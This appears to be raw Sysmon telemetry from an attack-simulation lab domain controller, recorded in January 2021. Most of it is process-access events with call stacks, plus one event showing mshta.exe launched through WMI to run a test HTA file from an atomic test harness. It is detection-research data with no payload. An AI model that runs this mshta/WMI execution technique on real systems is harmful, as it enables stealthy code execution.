15:59:13.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022523Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022522Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.820{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5351-6008-2206-00000000A301}6044C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022521Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.820{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5351-6008-2206-00000000A301}6044C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022520Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022519Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022518Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022517Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022516Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022515Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022514Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022513Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022512Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022511Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.820{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022510Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.804{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5351-6008-2206-00000000A301}6044C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022509Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.804{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5351-6008-2206-00000000A301}6044C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022508Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.788{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-5351-6008-2206-00000000A301}6044C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000022507Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.788{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022506Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.788{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022505Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.788{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022504Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.788{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022503Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.788{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-5351-6008-2206-00000000A301}6044C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000022502Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2206-00000000A301}6044C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000022501Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.796{7901BC46-5351-6008-2206-00000000A301}6044C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Windows\System32\mshta.exe" "C:\Users\Administrator\Downloads\AtomicTestHarnesses-master\AtomicTestHarnesses-master\TestHarnesses\Test.hta"C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000022500Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 